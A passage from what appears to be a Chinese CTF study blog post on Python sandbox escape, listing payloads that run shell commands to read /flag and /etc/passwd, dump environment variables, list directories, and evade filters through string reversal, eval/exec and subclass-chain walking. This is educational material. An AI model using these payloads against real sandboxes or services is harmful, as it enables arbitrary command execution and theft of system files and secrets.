<span class="line"><span># 让底层 shell 把结果写进 1.txt</span></span>
<span class="line"><span>timeit.timeit("__import__('os').system('cat /flag > 1.txt')", number=1)</span></span>
<span class="line"><span>print(open('1.txt').read())</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/7.png" class=""></p>
<h2 id="platform"><a class="anchor" href="#platform">#</a> platform</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import platform</span></span>
<span class="line"><span>print(platform.popen('dir').read())</span></span></code></pre>
<p>这个和 commands一样也只能用于python2环境</p>
<h2 id="importlib"><a class="anchor" href="#importlib">#</a> importlib</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import importlib</span></span>
<span class="line"><span>importlib.import_module('os').system('cat /flag > /tmp/1.txt')</span></span>
<span class="line"><span>print(open('/tmp/1.txt').read())</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/8.png" class=""></p>
<p>或者可以：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import importlib</span></span>
<span class="line"><span>result = importlib.import_module('os').popen('cat /flag').read()</span></span>
<span class="line"><span>print(result)</span></span></code></pre>
<h2 id="sys"><a class="anchor" href="#sys">#</a> sys</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import sys</span></span>
<span class="line"><span>result=sys.modules['os'].popen('cat /flag').read()</span></span>
<span class="line"><span>print(result)</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/9.png" class=""></p>
<p>这里利用的是popen而不是system，是因为用system就不能使用<code>.read()</code>方法</p>
<h2 id="linecache"><a class="anchor" href="#linecache">#</a> linecache</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import linecache</span></span>
<span class="line"><span>linecache.os.system('ls')</span></span></code></pre>
<p>在使用这个之前可以尝试print(dir(linecache))看看该版本的python下有没有os直接属性</p>
<h1 id="读写文件"><a class="anchor" href="#读写文件">#</a> 读写文件</h1>
<h2 id="file类python2"><a class="anchor" href="#file类python2">#</a> file类（python2）</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>file('test.txt').read()</span></span></code></pre>
<h2 id="open函数"><a class="anchor" href="#open函数">#</a> open函数</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>open('/etc/passwd').read()</span></span>
<span class="line"><span>__builtins__.open('/etc/passwd').read()</span></span>
<span class="line"><span>__import__("builtins").open('/etc/passwd').read()</span></span>
<span class="line"><span></span></span>
<span class="line"><span>直接使用这些是没有回显的，所以需要print输出一下</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/10.png" class=""></p>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/11.png" class=""></p>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/12.png" class=""></p>
<h2 id="codecs模块"><a class="anchor" href="#codecs模块">#</a> codecs模块</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import codecs</span></span>
<span class="line"><span>print(codecs.open('/flag').read())</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/13.png" class=""></p>
<h2 id="getline函数"><a class="anchor" href="#getline函数">#</a> getline函数</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>print(__import__("linecache").getline('/flag',1))</span></span>
<span class="line"><span>#第二个参数是指定行号</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/15.png" class=""></p>
<h2 id="getlines函数"><a class="anchor" href="#getlines函数">#</a> getlines函数</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import linecache</span></span>
<span class="line"><span>print(linecache.getlines('/flag'))</span></span>
<span class="line"><span></span></span>
<span class="line"><span>print(__import__("linecache").getlines('/etc/passwd'))</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/16.png" class=""></p>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/17.png" class=""></p>
<h2 id="license函数"><a class="anchor" href="#license函数">#</a> license函数</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>__builtins__.__dict__["license"]._Printer__filenames=["/flag"]</span></span>
<span class="line"><span>a = __builtins__.help</span></span>
<span class="line"><span>a.__class__.__enter__ = __builtins__.__dict__["license"]</span></span>
<span class="line"><span>a.__class__.__exit__ = lambda self, *args: None</span></span>
<span class="line"><span>with (a as b):</span></span>
<span class="line"><span>    pass</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/18.png" class=""></p>
<h1 id="枚举目录"><a class="anchor" href="#枚举目录">#</a> 枚举目录</h1>
<h2 id="os模块"><a class="anchor" href="#os模块">#</a> os模块</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import os</span></span>
<span class="line"><span>print(os.listdir("/"))</span></span>
<span class="line"><span></span></span>
<span class="line"><span>print(__import__('os').listdir('/'))</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/14.png" class=""></p>
<h2 id="glob模块"><a class="anchor" href="#glob模块">#</a> glob模块</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import glob</span></span>
<span class="line"><span>print(glob.glob("/f*"))</span></span>
<span class="line"><span></span></span>
<span class="line"><span>print(__import__('glob').glob("/f*"))</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/19.png" class=""></p>
<p>这段payload可以查看根目录下是否存在以<code>f</code>开头的目录或文件</p>
<h1 id="获取环境信息"><a class="anchor" href="#获取环境信息">#</a> 获取环境信息</h1>
<h2 id="popen"><a class="anchor" href="#popen">#</a> popen</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import os</span></span>
<span class="line"><span>print(os.popen('env').read())</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/20.png" class=""></p>
<p>直接<code>env</code>可以查看所有环境变量中的内容，加上<code>grep FLAG</code>就会单独输出这个值</p>
<h2 id="environ"><a class="anchor" href="#environ">#</a> environ</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import os</span></span>
<span class="line"><span>print(os.environ)</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/21.png" class=""></p>
<h2 id="sys模块"><a class="anchor" href="#sys模块">#</a> sys模块</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>import sys</span></span>
<span class="line"><span>print(sys.version)</span></span>
<span class="line"><span>#这串payload可以用来查看python版本</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/22.png" class=""></p>
<h1 id="一些绕过手段"><a class="anchor" href="#一些绕过手段">#</a> 一些绕过手段</h1>
<h2 id="拼接绕过"><a class="anchor" href="#拼接绕过">#</a> 拼接绕过</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>b = 'o'</span></span>
<span class="line"><span>a = 's'</span></span>
<span class="line"><span>__import__(b+a).popen('cat /flag').read()</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/23.png" class=""></p>
<h2 id="利用字符串的变化处理os"><a class="anchor" href="#利用字符串的变化处理os">#</a> 利用字符串的变化处理os</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>print(__import__('so'[::-1]).popen('cat /flag').read())</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/24.png" class=""></p>
<p>还可以利用 <code>eval</code> 或者 <code>exec</code>：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>print(eval(')(daer.)"galf/ tac"(nepop.)"so"(__tropmi__'[::-1]))</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/25.png" class=""></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>exec('))(daer.)"galf/ tac"(nepop.so(tnirp ;so tropmi'[::-1])</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/26.png" class=""></p>
<h2 id="match-case语法绕过getattr限制"><a class="anchor" href="#match-case语法绕过getattr限制">#</a> match case语法绕过getattr()限制</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>match object:</span></span>
<span class="line"><span>    case object(__subclasses__=subclasses):</span></span>
<span class="line"><span>        print(subclasses())</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/29.png" class=""></p>
<p>但是<code>match</code>语法也可能在 AST 层面被过滤，即 <code>ast.Match</code></p>
<h1 id="通过继承关系逃逸"><a class="anchor" href="#通过继承关系逃逸">#</a> 通过继承关系逃逸</h1>
<p>这里特别像SSTI了，通过一连串的继承关系去找到os或其他执行命令，这里就不过多赘述了，主要给一些语句：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>print([index for index, cls in enumerate("".__class__.__bases__[0].__subclasses__()) if 'os._wrap_close' in str(cls)])</span></span>
<span class="line"><span>//这个print语句可以查找os_wrap_close在列表的第一个位置</span></span>
<span class="line"><span></span></span>
<span class="line"><span>print('\n'.join([f"[&#123;i&#125;] &#123;c&#125;" for i, c in enumerate("".__class__.__bases__[0].__subclasses__())]))</span></span>
<span class="line"><span>//这个print语句可以循环输出object的所有子类并标上序号</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/27.png" class=""></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>[158] &#x3C;class 'os._wrap_close'></span></span></code></pre>
<p>这里我的os类在158位</p>
<p><img loading="lazy" src="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/28.png" class=""></p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>for i in enumerate(''.__class__.__mro__[-1].__subclasses__()): print (i)</span></span>
<span class="line"><span>//如果是python2可以用这个</span></span></code></pre>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于 </span><time title="修改时间：2026-06-02 18:31:21" itemprop="dateModified" datetime="2026-06-02T18:31:21+08:00">2026-06-02</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>ZLARYY<i class="ic i-at"><em>@</em></i>欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~</li><li class="link"><strong>本文链接：</strong><a href="https://zlaryy.top/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/" title="沙箱逃逸">https://zlaryy.top/2026/03/27/沙箱逃逸/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2026/03/20/Pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8EPython%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="prev" itemprop="url" data-background-image="&#x2F;assets&#x2F;picture2.png" title="Pickle反序列化与Python原型链污染"><span class="type">上一篇</span><h3>Pickle反序列化与Python原型链污染</h3></a></div><div class="item right"><a href="/2026/04/02/flask%20session%E4%BC%AA%E9%80%A0%E4%B8%8Efilter-chain/" rel="next" itemprop="url" data-background-image="&#x2F;assets&#x2F;picture1.jpg" title="flask的session伪造与filter-chain"><span class="type">下一篇</span><h3>flask的session伪造与filter-chain</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8"><span class="toc-number">1.</span> <span class="toc-text"> 沙箱逃逸</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">2.</span> <span class="toc-text"> 命令执行</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#os"><span class="toc-number">2.1.</span> <span class="toc-text"> os</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#commands"><span class="toc-number">2.2.</span> <span class="toc-text"> commands</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ctypes"><span class="toc-number">2.3.</span> <span class="toc-text"> ctypes</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#subprocess"><span class="toc-number">2.4.</span> <span class="toc-text"> subprocess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pty"><span class="toc-number">2.5.</span> <span class="toc-text"> pty</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#timeit"><span class="toc-number">2.6.</span> <span class="toc-text"> timeit</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#platform"><span class="toc-number">2.7.</span> <span class="toc-text"> platform</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#importlib"><span class="toc-number">2.8.</span> <span class="toc-text"> importlib</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sys"><span class="toc-number">2.9.</span> <span class="toc-text"> sys</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#linecache"><span class="toc-number">2.10.</span> <span class="toc-text"> linecache</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%AF%BB%E5%86%99%E6%96%87%E4%BB%B6"><span class="toc-number">3.</span> <span class="toc-text"> 读写文件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#file%E7%B1%BBpython2"><span class="toc-number">3.1.</span> <span class="toc-text"> file类（python2）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#open%E5%87%BD%E6%95%B0"><span class="toc-number">3.2.</span> <span class="toc-text"> open函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#codecs%E6%A8%A1%E5%9D%97"><span class="toc-number">3.3.</span> <span class="toc-text"> codecs模块</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getline%E5%87%BD%E6%95%B0"><span class="toc-number">3.4.</span> <span class="toc-text"> getline函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getlines%E5%87%BD%E6%95%B0"><span class="toc-number">3.5.</span> <span class="toc-text"> getlines函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#license%E5%87%BD%E6%95%B0"><span class="toc-number">3.6.</span> <span class="toc-text"> license函数</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%9A%E4%B8%BE%E7%9B%AE%E5%BD%95"><span class="toc-number">4.</span> <span class="toc-text"> 枚举目录</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#os%E6%A8%A1%E5%9D%97"><span class="toc-number">4.1.</span> <span class="toc-text"> os模块</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#glob%E6%A8%A1%E5%9D%97"><span class="toc-number">4.2.</span> <span class="toc-text"> glob模块</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%8E%AF%E5%A2%83%E4%BF%A1%E6%81%AF"><span class="toc-number">5.</span> <span class="toc-text"> 获取环境信息</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#popen"><span class="toc-number">5.1.</span> <span class="toc-text"> popen</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#environ"><span class="toc-number">5.2.</span> <span class="toc-text"> environ</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sys%E6%A8%A1%E5%9D%97"><span class="toc-number">5.3.</span> <span class="toc-text"> sys模块</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E7%BB%95%E8%BF%87%E6%89%8B%E6%AE%B5"><span class="toc-number">6.</span> <span class="toc-text"> 一些绕过手段</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8B%BC%E6%8E%A5%E7%BB%95%E8%BF%87"><span class="toc-number">6.1.</span> <span class="toc-text"> 拼接绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9A%84%E5%8F%98%E5%8C%96%E5%A4%84%E7%90%86os"><span class="toc-number">6.2.</span> <span class="toc-text"> 利用字符串的变化处理os</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#match-case%E8%AF%AD%E6%B3%95%E7%BB%95%E8%BF%87getattr%E9%99%90%E5%88%B6"><span class="toc-number">6.3.</span> <span class="toc-text"> match case语法绕过getattr()限制</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E7%BB%A7%E6%89%BF%E5%85%B3%E7%B3%BB%E9%80%83%E9%80%B8"><span class="toc-number">7.</span> <span class="toc-text"> 通过继承关系逃逸</span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="ZLARYY" src="/assets/avertar.png"/><p class="name" itemprop="name">ZLARYY</p><div class="description" itemprop="description">Web安全 / CTF / 个人学习笔记</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">14</span><span class="name">文章</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/ZLARYY123" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;ZLARYY123"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2026/04/02/flask%20session%E4%BC%AA%E9%80%A0%E4%B8%8Efilter-chain/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2026/03/20/Pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8EPython%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div><div id="player"></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/20/Pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8EPython%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/">Pickle反序列化与Python原型链污染</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/07/XXE/">XXE</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/11/SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/">SSTI模板注入</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/12/SSRF/">SSRF</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/28/RCE/">RCE</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/23/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/">信息搜集</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/">常规外网打点</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/27/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/">沙箱逃逸</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/02/flask%20session%E4%BC%AA%E9%80%A0%E4%B8%8Efilter-chain/">flask的session伪造与filter-chain</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/10/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">ZLARYY @ ZLARYY</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">328k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">4:58</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
    path: `2026/03/27/沙箱逃逸/`,
    favicon: {
        show: `ZLARYY`,
        hide: `ZLARYY`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    nocopy: "false",
    copyright: `复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。`,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    }
};
</script><script src="/js/siteInit.js?v=0.5.4" type="module" fetchpriority="high" defer></script><!-- hexo injector body_end start -->
<script id="post-stats">
(function () {
  var API_NAME = 'ZLARYYPostStats';
  var BOX_SELECTOR = '.post-stats-box';
  var COUNT_LIMIT = 9999;

  if (window[API_NAME] && typeof window[API_NAME].run === 'function') {
    window[API_NAME].run();
    return;
  }

  function isPostPage() {
    return !!(window.LOCAL && window.LOCAL.ispost) || !!document.querySelector('article.post');
  }

  function storageKey(prefix) {
    return prefix + window.location.pathname;
  }

  function getStorageValue(storage, key) {
    try {
      return storage.getItem(key);
    } catch (error) {
      return null;
    }
  }

  function setStorageValue(storage, key, value) {
    try {
      storage.setItem(key, value);
    } catch (error) {}
  }

  function removeStorageValue(storage, key) {
    try {
      storage.removeItem(key);
    } catch (error) {}
  }

  function readCount(key) {
    var raw = getStorageValue(window.localStorage, key);
    var value = raw === null || raw === '' ? 0 : Number(raw);

    if (!Number.isInteger(value) || value < 0 || value > COUNT_LIMIT) {
      value = 0;
      setStorageValue(window.localStorage, key, '0');
    }

    return value;
  }

  function writeCount(key, value) {
    setStorageValue(window.localStorage, key, String(value));
  }

  function bumpViewCount() {
    var countKey = storageKey('zlaryy_view_count_');
    var sessionKey = storageKey('zlaryy_viewed_session_');
    var count = readCount(countKey);

    if (getStorageValue(window.sessionStorage, sessionKey) !== '1') {
      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      writeCount(countKey, count);
      setStorageValue(window.sessionStorage, sessionKey, '1');
    }

    return count;
  }

  function readLikeCount() {
    return readCount(storageKey('zlaryy_like_count_'));
  }

  function hasLiked() {
    return getStorageValue(window.localStorage, storageKey('zlaryy_liked_')) === '1';
  }

  function saveLikeState(count, liked) {
    writeCount(storageKey('zlaryy_like_count_'), count);
    if (liked) {
      setStorageValue(window.localStorage, storageKey('zlaryy_liked_'), '1');
    } else {
      removeStorageValue(window.localStorage, storageKey('zlaryy_liked_'));
    }
  }

  function clearRewardNodes() {
    document.querySelectorAll('.reward').forEach(function (reward) {
      reward.innerHTML = '';
      reward.classList.add('post-stats-host');
      reward.removeAttribute('style');
      reward.setAttribute('aria-label', 'post stats');
    });
  }

  function findInsertTarget() {
    var reward = document.querySelector('article.post .reward, .reward');
    if (reward) return { parent: reward, before: null };

    var footer = document.querySelector('article.post > footer');
    if (footer && footer.parentNode) return { parent: footer.parentNode, before: footer };

    var article = document.querySelector('article.post');
    if (article) return { parent: article, before: null };

    return null;
  }

  function createStatsBox(viewCount, likeCount, liked) {
    var box = document.createElement('div');
    box.className = 'post-stats-box';
    box.innerHTML = [
      '<button class="post-view-count" type="button" disabled aria-disabled="true">',
      '&#128065; &#x770b;&#x8fc7; <span class="local-view-count">' + viewCount + '</span> &#x6b21;',
      '</button>',
      '<button class="post-like-btn' + (liked ? ' liked' : '') + '" type="button" aria-pressed="' + (liked ? 'true' : 'false') + '">',
      '<span class="post-like-label">' + (liked ? '&#x5df2;&#x70b9;&#x8d5e;' : '&#x70b9;&#x8d5e;') + '</span> ',
      '<span class="local-like-count">' + likeCount + '</span>',
      '</button>'
    ].join('');

    return box;
  }

  function updateLikeButton(button, count, liked) {
    var labelNode = button.querySelector('.post-like-label');
    var countNode = button.querySelector('.local-like-count');

    if (labelNode) labelNode.textContent = liked ? '\u5df2\u70b9\u8d5e' : '\u70b9\u8d5e';
    if (countNode) countNode.textContent = String(count);

    button.classList.toggle('liked', liked);
